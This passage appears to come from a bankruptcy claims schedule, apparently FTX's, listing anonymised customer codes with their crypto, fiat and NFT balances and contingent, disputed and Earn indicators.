| 07373915 | | CUSDT[3], SHIB[280504.9088359], USD[0.17] | | |
| 07373917 | | USD[10.00] | | |
| 07373921 | | SOL[.25], USD[8.14] | | |
| 07373922 | | BRZ[2], CUSDT[6], SHIB[2], USD[49.49] | | |
| 07373924 | | TRX[4407.67738939], USD[0.00] | | |
| 07373925 | | BTC[0], DOGE[0], TRX[0], USD[0.00] | | |
| 07373926 | | CUSDT[1], ETH[.02898821], ETHW[.02898821], TRX[1], USD[121.63] | | |
| 07373927 | | DOGE[121.51151084], USD[0.00] | | |
| 07373928 | | USD[10.00] | | |
| 07373929 | | BTC[.00018185], CUSDT[1176.20218497], DOGE[467.59785805], USD[0.00] | | |
| 07373930 | | BRZ[2], CUSDT[6], DOGE[3], MATIC[0], SHIB[4417149.46444231], TRX[1], USD[741.57] | Yes | |
| 07373931 | | ETH[.565827], ETHW[.565827], SOL[.006], USD[0.46], USDT[123.67069425] | | |
| 07373933 | | USD[1.14] | | |
| 07373936 | | USD[10.00] | | |
| 07373937 | | DOGE[30.5480488], USD[0.69] | Yes | |
| 07373938 | | USD[10.00] | | |
| 07373939 | | BRZ[1], CUSDT[28], SOL[0.06488769], TRX[6], USD[0.00], USDT[0.00000001] | Yes | |
| 07373940 | | USD[10.00] | | |
| 07373941 | | DOGE[0], USD[0.00] | | |
| 07373942 | | USD[10.00] | | |
| 07373944 | | USD[10.00] | | |
| 07373946 | | DOGE[125.48471608], USD[0.00] | | |
| 07373947 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07373949 | | SOL[.80298311], USD[0.00] | | |
| 07373950 | | USD[10.00] | | |
| 07373952 | | BCH[.00000006], DAI[.00009142], ETH[.00000002], ETHW[.00000002], LINK[.00000172], LTC[.00000046], NFT (526543670424771055/Computer Generated Dino CGD # 10 of 500 )[1], SUSHI[.0000091], TRX[.00083005], USD[0.01], USDT[0] | Yes | |
| 07373953 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07373955 | | DOGE[0.20143732], USD[0.00] | Yes | |
| 07373957 | | USD[0.01] | | |
| 07373958 | | NFT (395670428013584970/Coachella x FTX Weekend 1 #8065)[1] | | |
| 07373959 | | BRZ[1], CUSDT[2], DOGE[1], USD[0.01], USDT[2] | | |
| 07373960 | | USD[10.00] | | |
| 07373961 | | DOGE[1359.34319649], SHIB[1293562.2733036], USD[0.00] | | |
| 07373962 | | BTC[.00000005], DOGE[.0123947], ETH[0.00000134], ETHW[0], MATIC[.00045745], SHIB[199.61647274], SOL[.00000616], TRX[3], USD[0.00] | Yes | |
| 07373964 | | BCH[.00168], CUSDT[11], DOGE[459.98036441], ETH[.03292236], ETHW[.03292236], LINK[1.901982], SOL[.52584517], TRX[105.09525637], USD[290.48] | | |
| 07373965 | | ETH[.00356494], ETHW[.00356494], USD[0.00] | | |
| 07373967 | | CUSDT[1], DOGE[.00004145], TRX[2], USD[0.01] | Yes | |
| 07373968 | | BRZ[1], DOGE[1], USD[0.00] | | |
| 07373969 | | USD[10.00] | | |
| 07373970 | | USD[0.00] | Yes | |
| 07373972 | Contingent, Disputed | LTC[0], USD[0.00], USDT[0] | Yes | |
| 07373973 | Contingent, Disputed | BF_POINT[200], CUSDT[4], MATIC[18.57886123], NFT (447015164533473654/Warriors 75th Anniversary Icon Edition Diamond #3139)[1], NFT (516596955633528904/Humpty Dumpty #243)[1], SOL[.73673], USD[0.00] | Yes | |
| 07373974 | | BAT[1], CUSDT[2], TRX[1], USD[0.00] | | |
| 07373975 | | TRX[213.18929695], USD[0.00] | | |
| 07373976 | | CUSDT[1], ETH[0.00342325], ETHW[0.00342325], USD[0.00] | | |
| 07373977 | | BRZ[3], CUSDT[43.00001373], DAI[.00079661], DOGE[8115.50543254], SHIB[16887128.34101224], UNI[1.09727515], USD[0.00], USDT[0] | Yes | |
| 07373978 | | BRZ[0], USD[0.01] | | |
| 07373979 | | CUSDT[7.27958925], GRT[.108946], SOL[.00029474], USD[0.65] | | |
| 07373980 | | USD[10.00] | | |
| 07373982 | | BAT[0], DOGE[0], ETH[0], GRT[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], YFI[0] | | |
| 07373983 | | BRZ[3], CUSDT[2], LINK[.00005053], TRX[2], USD[0.00] | Yes | |
| 07373985 | | DOGE[612.97669576], USD[10.00] | | |
| 07373989 | | USD[10.00] | | |
| 07373990 | | USD[10.00] | | |
| 07373991 | | USD[0.00] | | |
| 07373992 | | BTC[0], ETH[.00000001], ETHW[0], SOL[0], USD[0.90] | | |
| 07373993 | | BF_POINT[200], USD[0.01], USDT[0.00000001] | Yes | |
| 07373994 | | USD[10.00] | | |
| 07373996 | | USD[10.00] | | |
| 07373999 | | DOGE[385.28166324], USD[0.00] | | |
| 07374000 | | BAT[13.60650549], BF_POINT[100], BRZ[2], CUSDT[12], DAI[0], DOGE[0], ETH[0], ETHW[0.17923666], LTC[0], SHIB[9], SOL[0], TRX[0], USD[589.41] | Yes | |
| 07374001 | | USD[10.00] | | |
| 07374002 | | USD[10.00] | | |
| 07374003 | | GRT[4.36081039], USD[0.00] | | |
| 07374004 | | USD[10.00] | | |
| 07374006 | | TRX[.2452491], USD[8.95] | | |
| 07374007 | | USD[10.00] | | |
| 07374011 | | USD[0.01] | | |
| 07374012 | | USD[10.00] | | |
| 07374013 | | USD[0.00] | | |
| 07374014 | | DOGE[.02497689], USD[0.00] | | |
| 07374015 | | ALGO[.09204011], BRZ[13.68517394], CUSDT[51.15429208], GRT[11.53982389], SHIB[.00000034], SOL[.00036674], TRX[17.10213076], USD[2504.71], USDT[1.00037338] | Yes | |
| 07374016 | | USD[10.00] | | |
| 07374017 | | USD[10.00] | | |
| 07374018 | | USD[10.00] | | |
| 07374020 | | USD[10.00] | | |
| 07374021 | | CUSDT[1], DOGE[155.71281511], USD[0.00] | | |
| 07374022 | | USD[10.00] | | |
| 07374024 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07374025 | | USD[10.00] | | |
| 07374026 | | USD[0.01], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07374027 | | USD[0.00] | | |
| 07374028 | | BRZ[1], CUSDT[1], USD[0.01], USDT[0] | | |
| 07374030 | | USD[10.00] | | |
| 07374031 | | DOGE[4974.80258817], TRX[1], USD[0.00], USDT[0] | | |
| 07374032 | | BRZ[2], BTC[.00433773], CUSDT[1], DOGE[284.83670504], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07374033 | | CUSDT[1], USD[0.00] | Yes | |
| 07374034 | | USD[11.03] | Yes | |
| 07374035 | | USD[10.00] | | |
| 07374036 | | BAT[1.00151708], BTC[.00011282], CUSDT[13], DOGE[.01504868], SHIB[6], TRX[7], USD[0.01] | Yes | |
| 07374038 | | CUSDT[4], USD[0.01] | | |
| 07374039 | | DOGE[83.51293284], USD[281.03] | | |
| 07374040 | | USD[10.00] | | |
| 07374041 | | USD[10.00] | | |
| 07374043 | | BTC[0], CUSDT[6], DOGE[1], TRX[1], USD[83.22] | | |
| 07374044 | | CUSDT[3], SHIB[8406150.04626535], TRX[1], USD[0.00] | Yes | |
| 07374045 | | USD[0.01], USDT[0] | | |
| 07374047 | | BAT[1], BRZ[1], BTC[.00179251], CUSDT[7], DOGE[326.41156556], ETH[.06003911], ETHW[.06003911], GRT[2701.94629249], LINK[18.06149905], LTC[.31384682], PAXG[.00052653], SUSHI[6.00849315], TRX[2], USD[0.99], USDT[0], YFI[.16979227] | | |
| 07374049 | | AUD[0.00], CUSDT[3], DOGE[1], GBP[0.00], TRX[2], USD[57.72], USDT[0] | | |
| 07374051 | | DOGE[141.29782048], USD[0.00] | | |
| 07374052 | | USD[0.00] | | |
| 07374053 | | DOGE[1], USD[80.71] | | |
| 07374054 | | USD[10.00] | | |
| 07374055 | | TRX[1], USD[0.01] | | |
| 07374056 | | USD[0.00] | | |
| 07374057 | | BF_POINT[200], CUSDT[2], DOGE[9.61236933], GRT[403.55950449], SOL[22.4660447], SUSHI[26.50536691], TRX[3], UNI[5.39416811], USD[1353.84], USDT[1.11903812] | Yes | |
| 07374058 | | GRT[1.00367791], USD[0.01], USDT[0] | Yes | |
| 07374059 | | BTC[0.00004088], ETH[0], SOL[0.00000001], TRX[.62], USD[4.04], USDT[0] | | |
| 07374060 | | SHIB[1587131.57154478], USD[0.00] | Yes | |
| 07374061 | | USD[10.00] | | |
| 07374062 | | MATIC[10.60452175], USD[0.00] | Yes | |
| 07374063 | | USD[10.00] | | |
| 07374064 | | USD[10.00] | | |
| 07374065 | | CUSDT[4], DOGE[135.0400635], TRX[1], USD[0.49] | | |
| 07374066 | | TRX[178.20889716], USD[0.00] | | |
| 07374067 | | USD[0.00] | | |
| 07374069 | | USD[10.00] | | |
| 07374071 | | DOGE[56.03849934], USD[0.00] | | |
| 07374072 | | CUSDT[3], GRT[16.41555084], MATIC[13.03498809], TRX[133.99265034], USD[11.46] | Yes | |
| 07374074 | | USD[0.00], USDT[0] | | |
| 07374075 | | BTC[.0161674], DOGE[331.94823899], ETH[.21589708], ETHW[.21568038], USD[0.01] | Yes | |
| 07374076 | | PAXG[0], USD[44.08] | | |
| 07374077 | | USD[10.00] | | |
| 07374079 | Contingent, Disputed | CUSDT[2], DOGE[0], TRX[8.00674358], USD[0.00] | | |
| 07374080 | | CUSDT[2], DOGE[.0081], TRX[2], USD[0.01] | | |
| 07374081 | | USD[10.00] | | |
| 07374083 | | DOGE[122.62638242], USD[0.00] | | |
| 07374084 | | USD[10.00] | | |
| 07374085 | | USD[0.01] | | |
| 07374087 | | CUSDT[9350.81642759], DOGE[4729.13081458], MATIC[134.66695726], TRX[1259.30235759], USD[10.00] | | |
| 07374088 | | ETH[.00294061], ETHW[.00289954], USD[0.00] | Yes | |
| 07374090 | | CUSDT[1], DOGE[.86177662], USD[0.00] | | |
| 07374091 | | USD[10.00] | | |
| 07374092 | | BRZ[1], CUSDT[1], DOGE[.48679589], TRX[37.57763525], USD[0.00] | | |
| 07374093 | | USD[0.00] | Yes | |
| 07374094 | | USD[10.00] | | |
| 07374095 | | USD[10.00] | | |
| 07374096 | | DOGE[1], GRT[424.96025293], USD[10.00] | | |
| 07374097 | | ETH[0], MATIC[0], NEAR[0], NFT [413817339979205182/FTX x CAL: The Decision #105][1], SOL[0], TRX[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07374098 | | DOGE[0], ETH[0], SOL[0], SUSHI[0], UNI[0], USD[2.01], YFI[0] | | |
| 07374099 | | BTC[.00017817], DOGE[90.86073234], TRX[1], USD[0.01] | | |
| 07374100 | | USD[0.00] | | |
| 07374101 | | CUSDT[16], DOGE[1865.69449837], TRX[2], USD[0.00] | | |
| 07374102 | | BAT[0], BTC[0], DOGE[0], ETH[0], GRT[0], LTC[0], PAXG[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07374103 | | CUSDT[1], DOGE[215.13769706], TRX[3], USD[8.77] | | |
| 07374104 | | BRZ[3], CUSDT[6], DOGE[.94066077], GRT[1], TRX[2.49470257], USD[0.74] | | |
| 07374105 | | USD[9.90] | | |
| 07374107 | | USD[0.01] | | |
| 07374108 | | SHIB[2409.17614396], USD[0.00] | Yes | |
| 07374109 | | CUSDT[1], USD[0.01] | | |
| 07374110 | | CUSDT[1], DOGE[126.27763088], USD[0.00] | | |
| 07374111 | | BRZ[1], BTC[0], GRT[1.00367791], SOL[1.09295545], TRX[1], USD[0.01] | Yes | |
| 07374112 | | SOL[6.82604123], USDT[0.00000008] | | |
| 07374113 | | BRZ[2], TRX[1], USD[0.00] | | |
| 07374114 | | BTC[.00000344], CUSDT[2], GRT[1], TRX[1], USD[0.01] | | |
| 07374115 | | BCH[.0002], DOGE[.0784], ETH[.0000962], ETHW[.0000962], GRT[.5338], LTC[.007732], SUSHI[.477325], TRX[.5317], USD[126.05], USDT[0.00436536] | | |
| 07374117 | | USD[10.00] | | |
| 07374118 | | USD[0.00] | | |
| 07374120 | | CUSDT[1], DOGE[.57379843], USD[0.12] | | |
| 07374121 | | USD[10.00] | | |
| 07374122 | | CUSDT[2], DOGE[1], GRT[1.00367791], SHIB[7133184.35543754], TRX[1], USD[0.01] | Yes | |
| 07374123 | | USD[10.00] | | |
| 07374124 | | SOL[1.16953361], USD[0.00] | Yes | |
| 07374125 | | CAD[0.00], CUSDT[1], DOGE[16.69903227], ETH[.00002934], ETHW[.00002934], GBP[0.00], TRX[39.73055332], USD[0.00], USDT[0] | Yes | |
| 07374127 | | TRX[2], USD[0.00] | | |
| 07374128 | | BRZ[1], USD[0.00] | | |
| 07374129 | | BTC[.00672946], CUSDT[1], DOGE[4], ETH[.05276646], ETHW[.05276646], GRT[11.22874984], SHIB[1], UNI[1.07241298], USD[25.02] | | |
| 07374130 | | CUSDT[1], DOGE[1], SHIB[20000274.28461264], SOL[0], TRX[0], USD[199.35], USDT[0] | Yes | |
| 07374131 | | DOGE[2064.7451407], USD[0.00], USDT[1] | | |
| 07374132 | | DOGE[7938.98643582], GRT[1], USD[638.83] | | |
| 07374133 | | BAT[1045.08053388], DOGE[1], GRT[917.72195117], USD[66.23] | Yes | |
| 07374135 | | BRZ[1], CUSDT[1], GRT[1], USD[0.00] | | |
| 07374136 | | USD[0.00] | | |
| 07374138 | | USD[0.00] | | |
| 07374139 | | CUSDT[1], DOGE[3014.97071282], USD[0.01] | | |
| 07374140 | | USD[10.00] | | |
| 07374141 | | USD[10.00] | | |
| 07374142 | | USD[10.00] | | |
| 07374143 | | USD[0.01] | | |
| 07374144 | | USD[10.00] | | |
| 07374145 | | BAT[1.0165555], CUSDT[1], DOGE[20.45052169], ETH[.00000001], ETHW[1.42221969], TRX[1], USD[0.02] | Yes | |
| 07374146 | | DOGE[1723.50492577], USD[0.00] | | |
| 07374147 | | BAT[1], BRZ[2], BTC[0], CUSDT[5], DOGE[1], TRX[4], USD[255.42], USDT[0.00000001] | | |
| 07374150 | | DOGE[35.78879845], TRX[1], USD[57.47] | | |
| 07374151 | | BTC[.0000066], DOGE[.6536], ETH[.4099626], ETHW[0.94596260], MATIC[.22], NFT [31243047722972 6083/Entrance Voucher #3282][1], NFT [37129641505839 7182/Gloom Punk #3583][1], NFT [488479801655840 822/Romeo #916][1], SOL[.00668], TRX[.000001], USD[-52.54], USDT[0.00833200] | | |
| 07374152 | | USD[10.00] | | |
| 07374153 | | USD[10.00] | | |
| 07374154 | | DOGE[33.44644793], GRT[12.52023159], USD[0.00] | Yes | |
| 07374155 | | BAT[0], DOGE[1], USD[0.00] | | |
| 07374156 | | USD[10.00] | | |
| 07374157 | | USD[0.00] | | |
| 07374158 | | USD[0.00] | | |
| 07374159 | | BTC[.00017788], USD[0.00] | | |
| 07374161 | | SOL[0], USD[0.01], USDT[0.00000001] | Yes | |
| 07374163 | | USD[10.00] | | |
| 07374164 | | DOGE[1], ETH[.00366122], ETHW[.00366122], USD[0.00] | | |
| 07374165 | | BRZ[1], CUSDT[1], DOGE[1.00058288], TRX[1], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07374166 | | USD[10.00] | | |
| 07374167 | | BRZ[1], CUSDT[5], TRX[8], USD[0.00], USDT[3] | | |
| 07374168 | | USD[0.00], USDT[0] | | |
| 07374169 | | BAT[1], BRZ[3], CUSDT[6], DOGE[6], TRX[2], USD[0.00], USDT[4] | | |
| 07374171 | | BAT[10.62613697], BRZ[2], CUSDT[11], DOGE[2.00004774], MATIC[31.20022689], SHIB[1651595.19162082], SOL[5.87943901], TRX[1], USD[0.00] | | |
| 07374172 | | USD[10.00] | | |
| 07374173 | | CUSDT[5], GRT[1], LTC[.02571318], TRX[1], USD[0.00] | | |
| 07374174 | | CUSDT[1.0074309], DOGE[.00001642], TRX[.0822642], USD[0.01] | Yes | |
| 07374175 | | USD[10.00] | | |
| 07374176 | | BTC[0], ETH[0], GRT[0], SOL[0], SUSHI[0], USD[0.00], YFI[0] | Yes | |
| 07374178 | | USD[10.00] | | |
| 07374179 | | DOGE[131.07841753], USD[0.00] | | |
| 07374180 | | USD[10.00] | | |
| 07374181 | | USD[10.00] | | |
| 07374182 | | BRZ[1], BTC[.00018176], DOGE[1090.49549418], USD[0.00] | Yes | |
| 07374183 | | BRZ[1], CUSDT[1], DOGE[154.38956965], USD[0.01] | | |
| 07374184 | | USD[10.00] | | |
| 07374185 | | CUSDT[2], DOGE[6.49298011], TRX[1], USD[0.01] | Yes | |
| 07374186 | | USD[10.00] | | |
| 07374189 | | USD[10.00] | | |
| 07374191 | | USD[10.00] | | |
| 07374192 | | DOGE[2905.5500939], USD[10.00] | | |
| 07374193 | | BAT[1], BF_POINT[200], DOGE[4], ETH[.00000001], SHIB[59], SOL[0.00000001], TRX[6], USD[0.74], USDT[0.76000000] | | |
| 07374194 | | BRZ[4], CUSDT[10], DOGE[0], GRT[0], LTC[0], TRX[0], USD[0.00], USDT[1] | | |
| 07374195 | | CUSDT[3], DOGE[236.76364177], TRX[2], USD[0.24], USDT[0.94705580] | | |
| 07374196 | | BCH[.001992], USD[0.18] | | |
| 07374197 | | BAT[1], CUSDT[3], GRT[.00003784], TRX[3], USD[0.00] | | |
| 07374199 | | USD[0.20], USDT[0] | | |
| 07374200 | | CUSDT[9], DOGE[7271.26914442], PAXG[.00604421], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07374201 | | BTC[0], ETH[0], GRT[0], MKR[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0.00000120], WBTC[0] | | |
| 07374202 | | USD[10.00] | | |
| 07374203 | | USD[10.00] | | |
| 07374204 | | BTC[0], CUSDT[0], USD[0.00] | | |
| 07374206 | | BRZ[1], BTC[.07664219], DOGE[1.02014116], TRX[2], USD[0.00] | | |
| 07374207 | | CUSDT[1], DOGE[4052.00398615], TRX[2], USD[0.01], USDT[1] | | |
| 07374208 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07374210 | | ETH[0], ETHW[0], USD[0.01] | Yes | |
| 07374211 | | USD[0.00] | | |
| 07374213 | | USD[10.00] | | |
| 07374214 | | CUSDT[1], TRX[.00504059], USD[0.00] | Yes | |
| 07374218 | | DOGE[1], TRX[796.65845445], USD[0.00] | | |
| 07374219 | | BRZ[0], BTC[0], CUSDT[2], ETH[0], ETHW[0], USD[0.00], USDT[1] | | |
| 07374220 | | DOGE[28.09958831], TRX[1], USD[0.00] | | |
| 07374222 | | CUSDT[1], USD[0.00], USDT[9.94307974] | | |
| 07374224 | | BTC[0], DOGE[3], SOL[0], USD[0.00] | | |
| 07374225 | | USD[10.00] | | |
| 07374226 | | CUSDT[7], DOGE[2], KSHIB[0], TRX[842.4658151], USD[0.00], USDT[0] | Yes | |
| 07374227 | | DOGE[.10360727], SUSHI[1.53284214], USD[13.59] | Yes | |
| 07374229 | | CUSDT[5], DOGE[355.18150149], USD[0.76] | | |
| 07374231 | | USD[10.00] | | |
| 07374232 | | CUSDT[1], DOGE[1484.88673373], USD[10.00] | | |
| 07374233 | | DOGE[200.18220584], USD[0.00] | | |
| 07374237 | | USDT[0.00000003] | | |
| 07374238 | | CUSDT[2], DOGE[1.0007678], TRX[79.54349916], USD[0.00] | | |
| 07374239 | | CUSDT[5], TRX[2], USD[0.00] | Yes | |
| 07374240 | | BTC[.00044958], CUSDT[2], DOGE[424.4316596], TRX[1], USD[0.00] | | |
| 07374242 | | CUSDT[8], ETH[.603371], ETHW[.60311203], TRX[6], USD[0.01] | Yes | |
| 07374244 | | BTC[.00009153], CUSDT[1], MATIC[3.98254897], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07374245 | | DOGE[1611.6300761], TRX[1], USD[0.00] | | |
| 07374246 | | USD[10.00] | | |
| 07374247 | | BTC[0], CUSDT[1], DOGE[1], ETH[0.00000001], ETHW[0], LTC[0], TRX[2], USD[0.00], USDT[0.00036830] | | |
| 07374248 | | BTC[0], USD[0.01] | | |
| 07374249 | | BRZ[1], CUSDT[5], SHIB[1217721.24076485], TRX[2], USD[0.00] | | |
| 07374250 | | USD[10.00] | | |
| 07374251 | | BAT[.00000001], BRZ[0], BTC[0], DOGE[8.92173845], TRX[0], USD[0.00], USDT[0] | | |
| 07374252 | | CUSDT[3], GRT[22.29595241], USD[0.00] | Yes | |
| 07374254 | | BRZ[1], CUSDT[5], DOGE[.00815996], GRT[1], TRX[1], USD[0.00] | | |
| 07374255 | | BAT[0], BTC[0], CUSDT[4], DOGE[1], ETH[0], LTC[0], NFT (396684203920928106/Second 50 #5)[1], NFT (401138162611326948/First 50 #43)[1], NFT (447194840983820298/AI-generated landscape #146)[1], NFT (486475737038957514/Computer Generated Dino CGD # 3 of 500 )[1], NFT (494331724721522794/AI-generated landscape #150)[1], NFT (533712183688309699/Second 50 #3)[1], NFT (568277614271129352/Saying #0003)[1], NFT (575491969681934247/Sand Bar #3)[1], SOL[0.05158949], SUSHI[0], TRX[2], USD[0.01], USDT[0] | Yes | |
| 07374256 | | USD[10.00] | | |
| 07374257 | | BAT[0], BRZ[2], BTC[0], CUSDT[3], DOGE[5084.69014893], GRT[0], LTC[0], TRX[0], USD[0.00] | Yes | |
| 07374258 | | DOGE[142.53745092], USD[0.00] | Yes | |
| 07374259 | | BRZ[0], ETH[.00017437], ETHW[.00017437], USD[0.00] | Yes | |
| 07374261 | | USD[10.00] | | |
| 07374263 | | DOGE[15.93725058], USD[0.00] | | |
| 07374264 | | DOGE[0], LTC[0], SHIB[24601.86524213], TRX[0], USD[0.00] | | |
| 07374265 | | CUSDT[1], TRX[169.32925633], USD[0.00] | | |
| 07374266 | | USD[10.00] | | |
| 07374268 | | USD[10.00] | | |
| 07374269 | | EUR[0.00], SHIB[3], USD[0.00], USDT[0] | Yes | |
| 07374270 | | USD[0.00] | | |
| 07374272 | | USD[0.00] | | |
| 07374273 | | BRZ[1], CUSDT[1], DOGE[289.28185909], SHIB[2011802.57510729], TRX[1], USD[0.93] | | |
| 07374274 | | USD[10.00] | | |
| 07374275 | | BAT[2.12260605], BRZ[7.736122], CUSDT[15], DOGE[9142.3373317], GRT[1.00498957], SUSHI[1.10484738], TRX[17.58170499], USD[13.45], USDT[2.21032057] | Yes | |
| 07374276 | | USD[10.00] | | |
| 07374277 | | USD[10.00] | | |
| 07374281 | | DOGE[15.09793691], USD[0.00] | | |
| 07374282 | | DOGE[10330.2257417], USD[0.00] | Yes | |
| 07374283 | | CUSDT[4], DOGE[0], TRX[146.82557664], USD[0.00] | | |
| 07374284 | | BAT[766.36717555], BTC[.00877829], DOGE[5305.3144744], LINK[25.1580437], LTC[5.08587529], MATIC[88.24912936], NFT (302500903785950085/Yetai #2578)[1], NFT (381897110166067323/Vox World #5)[1], SOL[11.03052034], SUSHI[74.56225964], UNI[23.30227786], USD[0.00], USDT[0] | Yes | |
| 07374285 | | USD[10.00] | | |
| 07374286 | | USD[10.00] | | |
| 07374287 | | DOGE[1], USD[0.00] | | |
| 07374288 | | USD[0.00], USDT[10.83647801] | | |
| 07374289 | | DOGE[184.35159912], ETH[0.00000058], ETHW[0.00000058], LTC[.1410518], SHIB[66392.46272511], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07374290 | | SHIB[662.95770786], USD[0.00], USDT[0] | Yes | |
| 07374291 | | USD[10.00] | | |
| 07374292 | | USD[0.00] | | |
| 07374293 | | TRX[1], USD[0.01] | | |
| 07374294 | | USD[0.20] | | |
| 07374295 | | USD[10.00] | | |
| 07374296 | | USD[10.00] | | |
| 07374297 | | BRZ[1], CUSDT[5], DOGE[2], TRX[1], USD[48.98], USDT[1] | | |
| 07374298 | | USD[10.00] | | |
| 07374299 | | USD[10.00] | | |
| 07374301 | | DOGE[124.04222347], USD[0.00] | | |
| 07374303 | | USD[10.00] | | |
| 07374304 | | USD[10.00] | | |
| 07374305 | | BTC[0], DAI[.00229614], ETH[.03996201], ETHW[.03996200], USD[0.00] | | |
| 07374306 | | USD[10.00] | | |
| 07374307 | | USD[10.00] | | |
| 07374309 | | USD[0.00] | | |
| 07374310 | | BTC[.00001900], ETH[.00000001], ETHW[0], SOL[0], USD[606.88] | | |
| 07374311 | | BF_POINT[200], USD[11.01] | Yes | |
| 07374312 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07374313 | | USD[0.00] | | |
| 07374315 | | TRX[147.93178862], USD[0.00] | | |
| 07374316 | | BTC[.00004193], DOGE[1267.18990819], TRX[1], USD[0.00] | | |
| 07374317 | | BTC[.00020487], TRX[1], USD[0.00] | | |
| 07374318 | | BAT[1], BTC[.03579623], CUSDT[3], DOGE[4197.09027178], ETH[.05048147], ETHW[.05048147], USD[0.00], USDT[1] | | |
| 07374320 | | USD[10.00] | | |
| 07374321 | | DOGE[.72], SUSHI[14.94], USD[4.80] | | |
| 07374322 | | LINK[.30177575], USD[0.00] | | |
| 07374323 | | USD[10.00] | | |
| 07374324 | | DOGE[140.39073831], USD[0.00] | | |
| 07374325 | | DOGE[1088.7541394], USD[0.00] | Yes | |
| 07374326 | | DOGE[33.98665541], USD[0.00] | | |
| 07374327 | | CUSDT[4], GRT[339.11970287], TRX[1], USD[0.00] | | |
| 07374328 | | USD[0.00] | | |
| 07374329 | | DOGE[1], USD[0.01] | | |
| 07374330 | | USD[10.00] | | |
| 07374332 | | BTC[0.13991093], DOGE[3380.1866], ETH[1.63403004], ETHW[1.63403004], LINK[83.311365], UNI[65.18018233], USD[7450.58], USDT[0.00581750] | | |
| 07374334 | | DOGE[2], USD[0.00] | | |
| 07374335 | | BAT[1], BRZ[1], CUSDT[2], SOL[1], TRX[2], USD[0.00], USDT[1] | | |
| 07374336 | | USD[10.00] | | |
| 07374337 | | CUSDT[1], DOGE[1.02200152], SHIB[9.53044736], USD[0.00] | Yes | |
| 07374338 | | BCH[.00649937], BTC[.00048447], CUSDT[3], DOGE[23.21732174], ETH[.01099234], ETHW[.01099234], GRT[.00003654], LINK[.13729684], LTC[.04399213], SHIB[127371.9781648], SOL[.16903718], SUSHI[.83960846], TRX[283.52194003], USD[0.08] | | |
| 07374340 | | BTC[.001998], ETH[.056943], ETHW[.056943], LINK[.999], SOL[142.77], TRX[249.75], USD[8.49] | | |
| 07374341 | | ETH[.00135928], ETHW[.00135928], USD[8.00] | | |
| 07374342 | | USD[0.00] | | |
| 07374343 | | BAT[5.17220187], BCH[.01668511], CUSDT[5], DOGE[453.33741212], ETH[.00490014], ETHW[.00484542], USD[0.23] | Yes | |
| 07374344 | | USD[10.00] | | |
| 07374345 | | DOGE[362.71301999], USD[0.00] | | |
| 07374346 | | BRZ[1], CUSDT[15], DOGE[37208.9635582], GRT[.00003382], SHIB[9835246.23115594], TRX[753.93484822], USD[0.52] | Yes | |
| 07374347 | | BAT[3.26783551], BRZ[4], CUSDT[6], DOGE[28858.65804075], GRT[1.00404471], LTC[3.93460209], SHIB[6063247.75621779], SUSHI[1.10001485], TRX[13.33601375], USD[0.01], USDT[2.20077338] | Yes | |
| 07374348 | | USD[10.00] | | |
| 07374349 | | CUSDT[2], DOGE[1], USD[557.50] | | |
| 07374350 | | CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07374352 | | CUSDT[1], DOGE[335.84050448], SHIB[1192045.19263879], TRX[165.42573733], USD[0.17] | Yes | |
| 07374353 | | DOGE[123.73697034], USD[0.00] | | |
| 07374354 | | BTC[.0006705], DOGE[1], USD[0.00] | | |
| 07374355 | | USD[10.00] | | |
| 07374358 | | USD[10.00] | | |
| 07374359 | | USD[10.00] | | |
| 07374360 | | BRZ[4], CUSDT[6], TRX[3], USD[0.00], USDT[0] | | |
| 07374361 | | USD[10.00] | | |
| 07374363 | | USD[10.00] | | |
| 07374365 | | CUSDT[1], USD[0.01], USDT[1] | | |
| 07374366 | | TRX[1], USD[0.00] | | |
| 07374367 | | BRZ[1], CUSDT[13], DOGE[1765.79118946], TRX[569.08691865], USD[0.60] | Yes | |
| 07374369 | | BAT[1], BRZ[2], BTC[0], CUSDT[5626.03768235], DOGE[1], GRT[1], SUSHI[.00076326], UNI[1], USD[5.01] | | |
| 07374371 | | DOGE[126.30702509], USD[0.00] | | |
| 07374372 | | BTC[.00021672], CUSDT[1], USD[0.00] | | |
| 07374373 | | USD[10.00] | | |
| 07374374 | | CUSDT[2], GRT[1], TRX[1], USD[0.00], USDT[1] | | |
| 07374375 | | BRZ[1], CUSDT[1], DOGE[923.78063114], GRT[11.71721792], SOL[2.16941455], USD[0.00] | | |
| 07374376 | | USD[10.00] | | |
| 07374377 | | DOGE[.00022257], USD[0.01] | | |
| 07374379 | | BTC[.00549992], CUSDT[2], DOGE[84.92653099], ETH[.03685734], ETHW[.03640076], SOL[2.51170387], TRX[1], USD[0.47], USDT[5.37663075] | Yes | |
| 07374380 | | BTC[.00000899], CUSDT[3], DOGE[.00002368], TRX[3], USD[0.02] | | |
| 07374381 | | USD[11.04] | Yes | |
| 07374382 | | TRX[178.8927967], USD[0.00] | | |
